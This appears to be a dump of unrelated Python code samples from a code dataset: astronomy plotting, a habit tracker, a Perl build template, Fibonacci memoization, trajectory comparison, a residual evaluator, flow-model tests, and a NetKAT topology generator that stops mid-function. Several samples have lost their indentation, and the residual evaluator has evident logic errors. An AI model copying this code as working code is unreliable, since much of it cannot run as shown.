put_text('Airmass vs. UT. Note: %s is only observable within times with darkest shading.' % object_name).style(title_style)
buf = B.airmass_plot()
s = '%s Airmass plot' % object_name
put_image(buf.getvalue(),title=s)
# Optionally plot track of object on sky chart and a finding chart
if detailed:
# Sky track
put_text(' ')
put_text('%s Track on Sky. Note: Points are spaced hourly.' % object_name).style(title_style)
buf = B.sky_plot()
put_image(buf.getvalue())
# 10'x10' DSS image
put_text(' ')
put_text('10x10 arcmin finding chart for %s [Note: Solar System objects will not appear]' \
% object_name).style(title_style)
buf = B.image_field_plot()
        if buf is not None:
put_image(buf.getvalue())
# Report some recommendations for exposure time and filters
put_text(' ')
put_text('Recommendations and Observing Notes').style(title_style)
recommend_string = get_recommendation(object_name, objtype, is_extended, B, mode, seeing, myfilter,magnitude)
put_text(recommend_string)
# Optionally plot SNR vs. exposure time and table of sky conditions, SNR [point sources only]
if not is_extended and detailed:
# Plot SNR vs exposure time
put_text(' ')
put_text('Signal to Noise Ratio vs. Exposure time Plot').style(title_style)
buf = B.snr_plot(mode)
put_image(buf.getvalue())
# Table of sky conditions, ADU, and saturation times
put_text('Use this table and graph to determine suitable exposure times')
put_text(' ')
A,saturation_time = B.photometry_summary_table(mode)
put_text('Saturation exposure time = %.1f sec' % saturation_time)
put_table(A[1:], header = A[0])
if __name__ == "__main__":
main()
#start_server(main, port=8080, debug=True)
| StarcoderdataPython |
3271554 | <gh_stars>0
from habits.database.habit_repository import HabitRepository
from habits.database.database import Database
from habits.database.tracking_repository import TrackingRepository
import sys
class Command:
_args: list
_config: 'config'
_database: Database
_habit_repository: HabitRepository = None
_tracking_repository: TrackingRepository = None
def __init__(self, args: list, database: Database, config: 'config'):
self._args = args
self._config = config
self._database = database
@property
def args(self) -> list:
return self._args
@property
def config(self) -> 'config':
return self._config
@property
def database(self) -> Database:
return self._database
@property
def habit_repository(self) -> HabitRepository:
if self._habit_repository is None:
self._habit_repository = HabitRepository(self.database, self.config)
return self._habit_repository
@property
def tracking_repository(self) -> TrackingRepository:
if self._tracking_repository is None:
self._tracking_repository = TrackingRepository(self.database, self.config)
return self._tracking_repository
# Display a generic list of habits
def display_habit_list(self, period: str = None):
output = '{}{}{}{}{}\n'
for habit in self.habit_repository.fetch_all():
if period is not None and habit.period != period:
continue
sys.stdout.write(
output.format(
habit.id,
" " * (4 - len(str(habit.id))),
habit.period,
" " * (10 - len(str(habit.period))),
habit.title
)
)
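# Hedged usage sketch (not part of the original module): a concrete command can
# subclass Command and reuse the repositories and the display helper above. The
# method name `execute` and the argument convention are assumptions made for
# illustration only.
class ExampleListCommand(Command):
    def execute(self):
        # Show habits filtered by an optional period passed as the first argument.
        period = self.args[0] if self.args else None
        self.display_habit_list(period)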
| StarcoderdataPython |
1680499 | r=input("input the radius of the circle:")
area=3.14*float(r)*float(r)
print("The area of the circle is:",area)
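# Hedged variant (not in the original snippet): math.pi avoids the rounding
# error of the hard-coded 3.14 above.
import math
precise_area = math.pi * float(r) ** 2
print("The area using math.pi is:", precise_area)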
| StarcoderdataPython |
1617687 | <gh_stars>0
pkgname = "perl"
pkgver = "5.32.1"
pkgrel = 0
_perl_cross_ver = "1.3.5"
build_style = "gnu_configure"
make_cmd = "gmake"
hostmakedepends = ["gmake", "less"]
makedepends = ["zlib-devel", "bzip2-devel"]
depends = ["less"]
checkdepends = ["iana-etc", "perl-AnyEvent", "perl-Test-Pod", "procps-ng"]
pkgdesc = "Practical Extraction and Report Language"
maintainer = "q66 <<EMAIL>>"
license = "Artistic=1.0-Perl, GPL=1.0-or-later"
url = "https://www.perl.org"
sources = [
f"https://www.cpan.org/src/5.0/perl-{pkgver}.tar.gz",
f"https://github.com/arsv/perl-cross/releases/download/{_perl_cross_ver}/perl-cross-{_perl_cross_ver}.tar.gz"
]
sha256 = [
"03b693901cd8ae807231b1787798cf1f2e0b8a56218d07b7da44f784a7caeb2c",
"91c66f6b2b99fccfd4fee14660b677380b0c98f9456359e91449798c2ad2ef25"
]
# prevent a massive log dump
tool_flags = {
"CFLAGS": [
"-Wno-compound-token-split-by-macro",
"-DNO_POSIX_2008_LOCALE",
"-D_GNU_SOURCE",
],
"LDFLAGS": ["-Wl,-z,stack-size=2097152", "-pthread"],
}
options = ["!check"]
# Before updating this package to a new major version, run ${FILESDIR}/provides.pl
# against ${wrksrc} to find the list of built in packages.
provides = [
"perl-Archive-Tar=2.36-r1",
"perl-Attribute-Handlers=1.01-r1",
"perl-AutoLoader=5.74-r1",
"perl-CPAN=2.27-r1",
"perl-CPAN-Meta=2.150010-r1",
"perl-CPAN-Meta-Requirements=2.140-r1",
"perl-CPAN-Meta-YAML=0.018-r1",
"perl-Carp=1.50-r1",
"perl-Compress-Raw-Bzip2=2.093-r1",
"perl-Compress-Raw-Zlib=2.093-r1",
"perl-Config-Perl-V=0.32-r1",
"perl-Data-Dumper=2.174.01-r1",
"perl-Devel-PPPort=3.57-r1",
"perl-Devel-SelfStubber=1.06-r1",
"perl-Digest=1.17.01-r1",
"perl-Digest-MD5=2.55.01-r1",
"perl-Digest-SHA=6.02-r1",
"perl-Dumpvalue=1.21-r1",
"perl-Encode=3.06-r1",
"perl-Env=1.04-r1",
"perl-Exporter=5.74-r1",
"perl-ExtUtils-CBuilder=0.280234-r1",
"perl-ExtUtils-Constant=0.25-r1",
"perl-ExtUtils-Install=2.14-r1",
"perl-ExtUtils-MakeMaker=7.44-r1",
"perl-ExtUtils-Manifest=1.72-r1",
"perl-ExtUtils-ParseXS=3.40-r1",
"perl-File-Fetch=0.56-r1",
"perl-File-Path=2.16-r1",
"perl-File-Temp=0.2309-r1",
"perl-Filter-Simple=0.96-r1",
"perl-Filter-Util-Call=1.59-r1",
"perl-FindBin=1.51-r1",
"perl-Getopt-Long=2.51-r1",
"perl-HTTP-Tiny=0.076-r1",
"perl-I18N-Collate=1.02-r1",
"perl-I18N-LangTags=0.44-r1",
"perl-IO=1.43-r1",
"perl-IO-Compress=2.093-r1",
"perl-IO-Socket-IP=0.39-r1",
"perl-IO-Zlib=1.10-r1",
"perl-IPC-Cmd=1.04-r1",
"perl-IPC-SysV=2.07-r1",
"perl-JSON-PP=4.04-r1",
"perl-Locale-Maketext=1.29-r1",
"perl-Locale-Maketext-Simple=0.21.01-r1",
"perl-MIME-Base64=3.15-r1",
"perl-Math-BigInt=1.999818-r1",
"perl-Math-BigInt-FastCalc=0.5009-r1",
"perl-Math-BigRat=0.2614-r1",
"perl-Math-Complex=1.59.01-r1",
"perl-Memoize=1.03.01-r1",
"perl-Module-CoreList=5.20210123-r1",
"perl-Module-Load=0.34-r1",
"perl-Module-Load-Conditional=0.70-r1",
"perl-Module-Loaded=0.08-r1",
"perl-Module-Metadata=1.000037-r1",
"perl-NEXT=0.67.01-r1",
"perl-Net-Ping=2.72-r1",
"perl-Params-Check=0.38-r1",
"perl-PathTools=3.78-r1",
"perl-Perl-OSType=1.010-r1",
"perl-PerlIO-via-QuotedPrint=0.08-r1",
"perl-Pod-Checker=1.73-r1",
"perl-Pod-Escapes=1.07-r1",
"perl-Pod-Perldoc=3.2801-r1",
"perl-Pod-Simple=3.40-r1",
"perl-Pod-Usage=1.69-r1",
"perl-Safe=2.41.01-r1",
"perl-Scalar-List-Utils=1.55-r1",
"perl-Search-Dict=1.07-r1",
"perl-SelfLoader=1.26-r1",
"perl-Socket=2.029-r1",
"perl-Storable=3.21-r1",
"perl-Sys-Syslog=0.36-r1",
"perl-Term-ANSIColor=5.01-r1",
"perl-Term-Cap=1.17-r1",
"perl-Term-Complete=1.403-r1",
"perl-Term-ReadLine=1.17-r1",
"perl-Test=1.31-r1",
"perl-Test-Harness=3.42-r1",
"perl-Test-Simple=1.302175-r1",
"perl-Text-Abbrev=1.02-r1",
"perl-Text-Balanced=2.03-r1",
"perl-Text-ParseWords=3.30-r1",
"perl-Text-Tabs-2013.0523-r1",
"perl-Thread-Queue=3.14-r1",
"perl-Thread-Semaphore=2.13-r1",
"perl-Tie-File=1.06-r1",
"perl-Tie-RefHash=1.39-r1",
"perl-Time-HiRes=1.9764-r1",
"perl-Time-Local=1.28-r1",
"perl-Time-Piece=1.3401-r1",
"perl-Unicode-Collate=1.27-r1",
"perl-Unicode-Normalize=1.27-r1",
"perl-Win32=0.53-r1",
"perl-Win32API-File=0.1203.01-r1",
"perl-XSLoader=0.30-r1",
"perl-autodie=2.32-r1",
"perl-autouse=1.11-r1",
"perl-base=2.27-r1",
"perl-bignum=0.51-r1",
"perl-constant=1.33-r1",
"perl-encoding-warnings=0.13-r1",
"perl-experimental=0.020-r1",
"perl-if=0.0608-r1",
"perl-lib=0.65-r1",
"perl-libnet=3.11-r1",
"perl-parent=0.238-r1",
"perl-perlfaq=5.20200523-r1",
"perl-podlators=5.008-r1",
"perl-threads=2.25-r1",
"perl-threads-shared=1.61-r1",
"perl-version=0.9924-r1",
]
def pre_patch(self):
for f in (self.cwd / f"perl-{pkgver}").iterdir():
self.mv(f, ".")
for f in (self.cwd / f"perl-cross-{_perl_cross_ver}").iterdir():
if f.name == "utils":
self.mv(f / "Makefile", "utils")
f.rmdir()
continue
self.mv(f, ".")
def init_configure(self):
from cbuild.util import make
self.make = make.Make(self, wrksrc = ".")
self.env["HOSTCFLAGS"] = "-D_GNU_SOURCE"
self.tools["LD"] = self.tools["CC"]
# to prevent perl buildsystem from invoking bmake
self.env["MAKE"] = self.make.get_command()
def do_configure(self):
cargs = [
"--prefix=/usr",
"-Dusethreads", "-Duseshrplib", "-Dusesoname", "-Dusevendorprefix",
"-Dprefix=/usr", "-Dvendorprefix=/usr",
"-Dprivlib=/usr/share/perl5/core_perl",
"-Darchlib=/usr/lib/perl5/core_perl",
"-Dsitelib=/usr/share/perl5/site_perl",
"-Dsitearch=/usr/lib/perl5/site_perl",
"-Dvendorlib=/usr/share/perl5/vendor_perl",
"-Dvendorarch=/usr/lib/perl5/vendor_perl",
"-Dscriptdir=/usr/bin", "-Dvendorscript=/usr/bin",
"-Dinc_version_list=none", "-Dman1ext=1p", "-Dman3ext=3p",
"-Dman1dir=/usr/share/man/man1",
"-Dman3dir=/usr/share/man/man3",
"-Dd_sockaddr_in6=define",
]
if self.cross_build:
cargs.append("--target=" + self.build_profile.short_triplet)
cfl = self.get_cflags(shell = True)
lfl = self.get_ldflags(shell = True)
cargs.append("-Dcccdlflags=-fPIC")
cargs.append("-Doptimize=-Wall " + cfl)
cargs.append("-Dccflags=" + cfl)
cargs.append("-Dlddlflags=-shared " + lfl)
cargs.append("-Dldflags=" + lfl)
cargs.append("-Dperl_static_inline=static __inline__")
cargs.append("-Dd_static_inline")
self.do(self.chroot_cwd / "configure", cargs)
def do_check(self):
from cbuild.util import make
self.env["TEST_JOBS"] = str(make.jobs())
self.make.invoke("test")
def post_install(self):
for f in (self.destdir / "usr/share").rglob("*"):
if f.is_file() and not f.is_symlink():
f.chmod(0o644)
for f in (self.destdir / "usr/lib").rglob("*"):
if f.is_file() and not f.is_symlink():
f.chmod(0o644)
self.install_link("perl", f"usr/bin/perl{pkgver}")
# remove all pod files except those under
# /usr/share/perl5/core_perl/pod/ (FS#16488)
for f in (self.destdir / "usr/share/perl5/core_perl").glob("*.pod"):
f.unlink()
for d in (self.destdir / "usr/share/perl5/core_perl").iterdir():
if not d.is_dir() or d.name == "pod":
continue
for f in d.rglob("*.pod"):
f.unlink()
for f in (self.destdir / "usr/lib").rglob("*.pod"):
f.unlink()
for f in self.destdir.rglob(".packlist"):
f.unlink()
import re
import os
cfpath = self.destdir / "usr/lib/perl5/core_perl/Config_heavy.pl"
with open(cfpath) as ifile:
with open(self.cwd / "Config_heavy.pl.new", "w") as ofile:
for ln in ifile:
ln = re.sub("-specs=.*hardened-ld", "", ln)
ln = re.sub("-specs=.*hardened-cc1", "", ln)
ofile.write(ln)
cfpath.unlink()
os.rename(self.cwd / "Config_heavy.pl.new", cfpath)
cfpath.chmod(0o644)
| StarcoderdataPython |
1602436 | #!/usr/bin/env python3
from setuptools import setup, find_packages
import sys
VERSION = '0.1'
DESCRIPTION = 'Python import/export data in tecplot format'
with open('README.md') as f:
LONG_DESCRIPTION = ''.join(f.readlines())
if sys.version_info[:2] < (3, 5):
raise RuntimeError("Python version >= 3.5 required.")
setup(
version=VERSION,
name='py2tec',
author='luohancfd',
author_email='<EMAIL>',
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
long_description_content_type="text/markdown",
url="https://github.com/luohancfd/py2tec",
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'Topic :: Scientific/Engineering :: Chemistry',
'Topic :: Scientific/Engineering :: Physics',
'Topic :: Scientific/Engineering :: Atmospheric Science',
'License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)'
],
license="GPLv3+",
keywords=["Tecplot"],
platforms=["Windows", "Linux", "Solaris", "Mac OS-X", "Unix"],
python_requires='>=3.5',
install_requires=['numpy'],
packages=find_packages(exclude=["contrib", "docs", "tests*"])
)
| StarcoderdataPython |
108691 | <filename>app/init_db_objects.py<gh_stars>1-10
import datetime
from flask_sqlalchemy import SQLAlchemy
from app.models import Category, Currency, CurrencyRate
from app.user_models import User, ACCESS_LEVEL
from config import Config
# db = SQLAlchemy()
# migrate = Migrate()
# app = Flask(__name__)
# app.config.from_object(Config)
# db.init_app(app)
# app = None
class InitDB():
def __init__(self, app):
self.db = SQLAlchemy()
self.app = app
def init_all(self):
self.init_admin()
self.init_categories()
self.init_currencies()
self.do()
print("All necessary db objects successfully written!")
def init_admin(self):
with self.app.app_context():
if not User.query.filter_by(id=Config.TG_ADMIN_ID).first():
a = User()
a.id = Config.TG_ADMIN_ID
a.name = "superadmin"
a.access_level = ACCESS_LEVEL.ADMIN
self.db.session.add(a)
return self
def init_categories(self):
with self.app.app_context():
categories = {
1: Category()._construct(1, "income", "Доход", 1, "💰"),
2: Category()._construct(2, "transport", "Транспорт", 2, "🚕"),
3: Category()._construct(3, "supermarkets", "Супермаркеты", 3, "🏪"),
4: Category()._construct(4, "cafe", "Кафе", 4, "🍽"),
5: Category()._construct(5, "household", "Хозяйство", 5, "🛠"),
6: Category()._construct(6, "evolution", "Развитие", 6, "🧩"),
7: Category()._construct(7, "entertainment", "Развлечения", 7, "🎉"),
8: Category()._construct(8, "goods", "Вещи", 8, "💍"),
9: Category()._construct(9, "service", "Банки,гос,связь", 9, "🏛"),
10: Category()._construct(10, "gifts", "Подарки", 10, "🎁"),
11: Category()._construct(11, "donation", "Донаты", 11, "📥"),
13: Category()._construct(13, "investments", "Инвестиции", 13, "📊"),
14: Category()._construct(14, "health", "Здоровье", 14, "🍏"),
15: Category()._construct(15, "beauty", "Красота", 12, "💄"),
12: Category()._construct(12, "other", "Другое", 15, "❔"),
}
ids = [c.id for c in Category.query.all()]
for id, category in categories.items():
if id not in ids:
self.db.session.add(category)
return self
def init_currencies(self):
with self.app.app_context():
currencies = {
"rub": 1,
"idr": 5.5,
"usd": 73,
"eur": 88.5,
"gel": 23.5
}
currencies_db = Currency.get_all()
if len(currencies_db) == 0:
for iso, rate in currencies.items():
c = Currency()
c.iso = iso
if iso == "rub":
c.default = True
self.db.session.add(c)
cr = CurrencyRate()
cr.iso = iso
cr.date = datetime.date.today()
cr.rate = rate
self.db.session.add(cr)
return self
def do(self):
self.db.session.commit()
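# Hedged usage sketch (not part of the original module): seeding the database
# from an application entry point. Kept as comments because the real project
# presumably has its own app factory; the Flask construction below mirrors the
# commented-out block at the top of this file and is an assumption.
#
# from flask import Flask
# app = Flask(__name__)
# app.config.from_object(Config)
# InitDB(app).init_all()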
| StarcoderdataPython |
63938 | <gh_stars>1000+
# source: http://oeis.org/A000045
fibo_seq = [0, 1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, 144, 233, 377, 610,
987, 1597, 2584, 4181, 6765, 10946, 17711, 28657, 46368, 75025,
121393, 196418, 317811, 514229, 832040, 1346269, 2178309,
3524578, 5702887, 9227465, 14930352, 24157817, 39088169]
from functools import lru_cache
def fibonacci(n):
if n < 2:
return n
return fibonacci(n-2) + fibonacci(n-1)
@lru_cache()
def fibonacci2(n):
if n < 2:
return n
return fibonacci2(n-2) + fibonacci2(n-1)
def memoize(func):
'''simplest memoizing decorator'''
cache = {}
def memoized(*args):
if args not in cache:
cache[args] = func(*args)
return cache[args]
return memoized
def test():
for i, expected in enumerate(fibo_seq[:31]):
print(i, expected)
assert fibonacci(i) == expected
def chronograph():
global fibonacci
from time import time
t0 = time()
n = 32
res = fibonacci(n)
#res = [fibonacci(n) for n in range(30)]
t1 = time()
print(n, res, format(t1-t0, '0.6f'))
t0 = time()
res = fibonacci2(n)
#res = [fibonacci2(n) for n in range(30)]
t1 = time()
print(n, res, format(t1-t0, '0.6f'))
t0 = time()
fibonacci = memoize(fibonacci)
res = fibonacci(n)
#res = [fibonacci2(n) for n in range(30)]
t1 = time()
print(n, res, format(t1-t0, '0.6f'))
if __name__=='__main__':
#test()
chronograph()
| StarcoderdataPython |
80619 | <filename>docs/examples/plot_comparing.py
"""
Comparing
---------
traja allows comparing trajectories using various methods.
"""
import traja
df = traja.generate(seed=0)
df.traja.plot()
###############################################################################
# Fast Dynamic Time Warping of Trajectories
# =========================================
#
# Fast dynamic time warping can be performed using ``fastdtw``.
# Source article: `link <https://cs.fit.edu/~pkc/papers/tdm04.pdf>`_.
import numpy as np
rotated = traja.rotate(df, angle=np.pi / 10)
rotated.traja.plot()
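###############################################################################
# A minimal sketch (not part of the original example) of the ``fastdtw``
# comparison mentioned above, applied to the original and rotated trajectories.
# It assumes the ``fastdtw`` and ``scipy`` packages are installed.

from scipy.spatial.distance import euclidean
from fastdtw import fastdtw

dtw_distance, warp_path = fastdtw(df.traja.xy, rotated.traja.xy, dist=euclidean)
print(f"Fast DTW distance between the trajectories: {dtw_distance:.2f}")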
###############################################################################
# Compare trajectories hierarchically
# ===================================
# Hierarchical agglomerative clustering allows comparing trajectories as actograms
# and finding nearest neighbors. This is useful for comparing circadian rhythms,
# for example.
# Generate random trajectories
trjs = [traja.generate(seed=i) for i in range(20)]
# Calculate displacement
displacements = [trj.traja.calc_displacement() for trj in trjs]
traja.plot_clustermap(displacements)
###############################################################################
# Compare trajectories point-wise
# ===============================
dist = traja.distance_between(df.traja.xy, rotated.traja.xy)
print(f"Distance between the two trajectories is {dist}")
| StarcoderdataPython |
1678679 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import threading
from .expressions import Expressions, ExpressionVisitors
from .predicate import BoundPredicate, Predicate, UnboundPredicate
class ResidualEvaluator(object):
def visitor(self):
if not hasattr(self.thread_local_data, "visitors"):
self.thread_local_data.visitors = ResidualVisitor()
return self.thread_local_data.visitors
def __init__(self, spec, expr):
self._spec = spec
self._expr = expr
self.thread_local_data = threading.local()
def residual_for(self, partition_data):
return self.visitor().eval(partition_data)
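# Hedged usage sketch (not part of the original module): `spec`, `expr`, and
# `partition_data` below stand in for a real partition spec, a bound filter
# expression, and one partition's values; they are not constructed here.
#
#     evaluator = ResidualEvaluator(spec, expr)
#     residual = evaluator.residual_for(partition_data)
#     # `residual` is the part of the filter that still has to be checked
#     # row-by-row within that partition.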
class ResidualVisitor(ExpressionVisitors.BoundExpressionVisitor):
def __init__(self):
self.struct = None
def eval(self, struct):
self.struct = struct
def always_true(self):
return Expressions.always_true()
def always_false(self):
return Expressions.always_false()
def is_null(self, ref):
return self.always_true() if ref.get(self.struct) is None else self.always_false()
def not_null(self, ref):
return self.always_true() if ref.get(self.struct) is not None else self.always_false()
def lt(self, ref, lit):
return self.always_true() if ref.get(self.struct) < lit.value else self.always_false()
def lt_eq(self, ref, lit):
return self.always_true() if ref.get(self.struct) <= lit.value else self.always_false()
def gt(self, ref, lit):
return self.always_true() if ref.get(self.struct) > lit.value else self.always_false()
def gt_eq(self, ref, lit):
return self.always_true() if ref.get(self.struct) >= lit.value else self.always_false()
def eq(self, ref, lit):
return self.always_true() if ref.get(self.struct) == lit.value else self.always_false()
def not_eq(self, ref, lit):
return self.always_true() if ref.get(self.struct) != lit.value else self.always_false()
def not_(self, result):
return Expressions.not_(result)
def and_(self, left_result, right_result):
return Expressions.and_(left_result, right_result)
def or_(self, left_result, right_result):
return Expressions.or_(left_result, right_result)
def predicate(self, pred):
if isinstance(pred, BoundPredicate):
return self.bound_predicate(pred)
elif isinstance(pred, UnboundPredicate):
return self.unbound_predicate(pred)
raise RuntimeError("Invalid predicate argument %s" % pred)
def bound_predicate(self, pred):
part = self.spec.get_field_by_source_id(pred.ref.field_id)
if part is None:
return pred
strict_projection = part.transform.project_strict(part.name, pred)
        if strict_projection is not None:
bound = strict_projection.bind(self.spec.partition_type())
if isinstance(bound, BoundPredicate):
return super(ResidualVisitor, self).predicate(bound)
return bound
return pred
def unbound_predicate(self, pred):
bound = pred.bind(self.spec.schema.as_struct())
if isinstance(bound, BoundPredicate):
bound_residual = self.predicate(bound)
if isinstance(bound_residual, Predicate):
return pred
return bound_residual
return bound
| StarcoderdataPython |
1602985 | import numpy as np
from py.forest import Node
class Cube():
def __init__(self, node):
assert isinstance(node, Node)
self.start = node.start
self.end = node.end
self.dim = node.dim
self.id_string = node.id_string
self.split_axis = node.split_axis
self.split_vals = node.split_vals
self.vol = 1
for i in range(len(self.start)):
self.vol = self.vol*(self.end[i] - self.start[i])
self.frac = 0
self.child = [Cube(child_node) for child_node in node.child]
def est_density(self, pts, total):
        self.frac = np.shape(pts)[1] / total  # fraction of all points falling inside this cube
if self.split_axis != -1:
split_pts = self.split_points(pts)
for i in range(len(self.child)):
self.child[i].est_density(split_pts[i], total)
def split_points(self, pts):
_, num_pts = np.shape(pts)
indices = [[] for _ in range(len(self.split_vals) + 1)]
list_vals = [self.start[self.split_axis]]
        list_vals.extend(self.split_vals)  # flatten the split values; append would nest the whole list
list_vals.append(self.end[self.split_axis])
for i in range(num_pts):
for j in range(len(list_vals) -1):
if (pts[self.split_axis][i] >= list_vals[j]) and\
(pts[self.split_axis][i] < list_vals[j+1]):
indices[j].append(i)
split_pts = []
for j in range(len(list_vals) -1):
split_pts.append(pts[:, indices[j]])
return split_pts
def __str__(self):
str_val = "Cube ID: " + str(self.id_string) + "\n"
str_val += "Boundary: "
for i in range(self.dim):
str_val += " [" + str(self.start[i]) + ", " + str(self.end[i]) + "]"
if i < self.dim -1:
str_val += " x"
else:
str_val += "\n"
if self.split_axis != -1:
str_val += "Axis: " + str(self.split_axis) + ", "
str_val += "Split Values: " + str(self.split_vals)
return str_val
def print_cube(self):
print_list = [self]
while print_list:
cube = print_list.pop(0)
print(str(cube))
print_list.extend(cube.child)
| StarcoderdataPython |
99673 | import numpy as np
import torch
import torch.nn as nn
import torchtestcase
import unittest
from survae.transforms.bijections.coupling import *
from survae.nn.layers import ElementwiseParams, ElementwiseParams2d
from survae.tests.transforms.bijections import BijectionTest
class AdditiveCouplingBijectionTest(BijectionTest):
def test_bijection_is_well_behaved(self):
batch_size = 10
self.eps = 1e-6
for shape in [(6,),
(6,8,8)]:
for num_condition in [None, 1]:
with self.subTest(shape=shape, num_condition=num_condition):
x = torch.randn(batch_size, *shape)
if num_condition is None:
if len(shape) == 1: net = nn.Linear(3,3)
if len(shape) == 3: net = nn.Conv2d(3,3, kernel_size=3, padding=1)
else:
if len(shape) == 1: net = nn.Linear(1,5)
if len(shape) == 3: net = nn.Conv2d(1,5, kernel_size=3, padding=1)
bijection = AdditiveCouplingBijection(net, num_condition=num_condition)
self.assert_bijection_is_well_behaved(bijection, x, z_shape=(batch_size, *shape))
z, _ = bijection.forward(x)
if num_condition is None:
self.assertEqual(x[:,:3], z[:,:3])
else:
self.assertEqual(x[:,:1], z[:,:1])
class AffineCouplingBijectionTest(BijectionTest):
def test_bijection_is_well_behaved(self):
batch_size = 10
self.eps = 5e-6
for shape in [(6,),
(6,8,8)]:
for num_condition in [None, 1]:
with self.subTest(shape=shape, num_condition=num_condition):
x = torch.randn(batch_size, *shape)
if num_condition is None:
if len(shape) == 1: net = nn.Sequential(nn.Linear(3,3*2), ElementwiseParams(2))
if len(shape) == 3: net = nn.Sequential(nn.Conv2d(3,3*2, kernel_size=3, padding=1), ElementwiseParams2d(2))
else:
if len(shape) == 1: net = nn.Sequential(nn.Linear(1,5*2), ElementwiseParams(2))
if len(shape) == 3: net = nn.Sequential(nn.Conv2d(1,5*2, kernel_size=3, padding=1), ElementwiseParams2d(2))
bijection = AffineCouplingBijection(net, num_condition=num_condition)
self.assert_bijection_is_well_behaved(bijection, x, z_shape=(batch_size, *shape))
z, _ = bijection.forward(x)
if num_condition is None:
self.assertEqual(x[:,:3], z[:,:3])
else:
self.assertEqual(x[:,:1], z[:,:1])
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
1690418 | <gh_stars>1-10
#!/usr/bin/python
import argparse
import networkx
import random
import sys
debug = False
# Each host has PROB_NONLOCAL_HOST chance to be in a subnet different from its
# physical location.
PROB_NONLOCAL_HOST = 0.1
class Host:
# mac (int): host mac address
# ip (string): host ip address
# vlan (int): vlan
def __init__(self, mac, ip, vlan):
self.mac = mac
self.ip = ip
self.vlan = vlan
class LAN:
# LAN objects are initialized with their subnet, eg. "192.168.1" and a list
# of host IDs. NB: Each host is assumed to have a MAC address equal to its
# ID.
def __init__(self, subnet, router, switches, hosts, vlan):
assert(len(hosts) <= 256)
self.subnet = subnet
self.router = router
self.switches = switches
self.hosts = hosts
self.vlan = vlan
def __str__(self):
return '<LAN %s: %s>' % (self.subnet, ', '.join(map(lambda h: 'Host %d (%s)' % (h.mac, h.ip), self.hosts)))
def get_local_hosts(self):
return filter(lambda h: h.ip.startswith(self.subnet), self.hosts)
def get_nonlocal_hosts(self):
return filter(lambda h: not h.ip.startswith(self.subnet), self.hosts)
# Produce a Waxman graph with edges added between unconnected components.
def connected_waxman_graph(n):
g = networkx.waxman_graph(n)
if networkx.is_connected(g):
return g
ccs = [x for x in networkx.connected_components(g)]
while len(ccs) > 1:
cc1 = random.choice(ccs)
cc2 = random.choice(ccs)
while cc1 == cc2:
cc2 = random.choice(ccs)
g.add_edge(random.sample(cc1, 1)[0], random.sample(cc2, 1)[0])
ccs.remove(cc2)
if not networkx.is_connected(g):
sys.stderr.write('%s\n' % g.edges())
assert(networkx.is_connected(g))
return g
# Given a LAN number, convert to "X.Y.Z" such that
# n = X * (256 * 256) + Y * 256 + Z.
def convert_to_subnet(lan):
assert(lan <= 16777216)
part_1 = (int)(lan / 65536)
part_2 = (int)((lan % 65536) / 256)
part_3 = (int)(lan % 256)
assert(part_1 * 65536 + part_2 * 256 + part_3 == lan)
return '%d.%d.%d' % (part_1, part_2, part_3)
# Given a LAN number n and host ID h (i.e. MAC address), return an IP address
# "X.Y.Z.M" such that "X.Y.Z" = convert_to_subnet(n) and M = h % 256.
def convert_to_ip(lan, host):
return '%s.%d' % (convert_to_subnet(lan), host % 256)
def int_of_ip(ip):
parts = ip.split('.')
return ( int (parts[0]) * 256 * 256 * 256
+ int (parts[1]) * 256 * 256
+ int (parts[2]) * 256
+ int (parts[3]) )
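# Hedged sanity checks (not in the original script) illustrating the helpers
# above: LAN 1 maps to subnet '0.0.1', host 5 in that LAN gets IP '0.0.1.5',
# and int_of_ip packs that address back into 1 * 256 + 5.
assert convert_to_subnet(1) == '0.0.1'
assert convert_to_ip(1, 5) == '0.0.1.5'
assert int_of_ip('0.0.1.5') == 1 * 256 + 5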
# Generate a NetKAT topology from a networkx graph.
def topology_of_networkx(g):
t = []
for n in g:
if not g.node[n]['type'] == 'host':
for (neighbor, port) in g.node[n]['ports'].iteritems():
t.append('sw = %d; port = %d; sw := %d; port := %d' % (
n, port, neighbor, g.node[neighbor]['ports'][n]))
return '\n+ '.join(t)
def export_topology_of_networkx(g, out):
for n in g:
for (neighbor, port) in g.node[n]['ports'].iteritems():
out.write('(%s %d, %d)--(%s %d, %d)\n' % (
g.node[n]['type'].upper(), n, port,
g.node[neighbor]['type'].upper(), neighbor,
g.node[neighbor]['ports'][n]))
# Will return '' for a path of length 1 (i.e. a self loop).
def policy_of_path(g, path, target, ethDst_of_target):
assert(len(path) > 0)
switch_pols = []
current = path[0]
for n in path[1:]:
if 'host' in g.node[target]:
switch_pols.append('sw = %d; ethDst = %d; ip4Dst = %d; vlan = %d; port := %d' % (
current,
ethDst_of_target(target),
int_of_ip(g.node[target]['host'].ip),
g.node[target]['host'].vlan,
g.node[current]['ports'][n]))
else:
switch_pols.append('sw = %d; ethDst = %d; port := %d' % (
current,
ethDst_of_target(target),
g.node[current]['ports'][n]))
current = n
return '\n+ '.join(switch_pols)
# Generate a NetKAT policy encoding shortest path L2 forwarding for a networkx
# graph where nodes are annotated with type='switch' | 'router' | 'host' and port
# dictionaries. Routers are assumed to be the edges of the network and have
# MAC addresses equal to their node ID.
def spp_of_networkx(g, ethDst_of_target=(lambda x: x)):
routers = [n for (n, data) in filter(
lambda (n, data): data['type'] == 'router' or data['type'] == 'host',
g.nodes(data=True))]
# TODO: switch this to compute shortest path from all nodes to each router.
# Then, for each node for each target router, compute a policy for the next
# hop.
paths = []
for r1 in routers:
for r2 in routers:
if r1 == r2:
continue
path = networkx.shortest_path(g, source=r1, target=r2)
if g.node[path[0]]['type'] == 'host':
path = path[1:]
p = policy_of_path(g, path, r2, ethDst_of_target)
if len(p) > 0:
